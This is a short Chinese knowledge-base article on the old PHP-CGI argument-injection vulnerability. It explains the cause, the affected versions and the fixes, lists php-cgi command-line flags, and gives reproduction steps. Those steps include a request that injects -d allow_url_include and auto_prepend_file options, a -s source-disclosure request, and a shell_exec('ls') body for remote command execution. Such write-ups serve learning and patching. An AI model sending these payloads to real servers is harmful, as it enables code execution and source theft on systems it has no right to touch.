| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> PHP CGI漏洞 -> 正文阅读 |
|
[PHP知识库]PHP CGI漏洞 |
一、漏洞原理: HTTP请求的参数直接传递给Apache服务器,服务器识别不出便向前解析,导致“不合法”参数被执行。具有源码泄露、敏感信息泄露、后门植入、任意代码执行等危害。 二、影响版本:< PHP 5.3.12 或 < PHP 5.4.2 三、修复方法:升级PHP版本、过滤请求参数 四、命令执行: -b???????? 启动fastcgi进程 -c???????? 查看php.ini文件位置 -d???????? 指定配置项 -s???????? 显示文件源码 -n???????? 不要加载php.ini文件 -T???????? 执行指定次该文件 -h或-? 显示帮助 ······ 四、复现步骤 1.查看PHP版本 2.构造payload 修改请求: POST /Index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3a//input HTTP/1.1 GET /Index.php?-s ... 输入代码: <?php echo shell_exec("ls");?> ?? ?获取当前生成的文件 ... |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/14 14:41:45- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |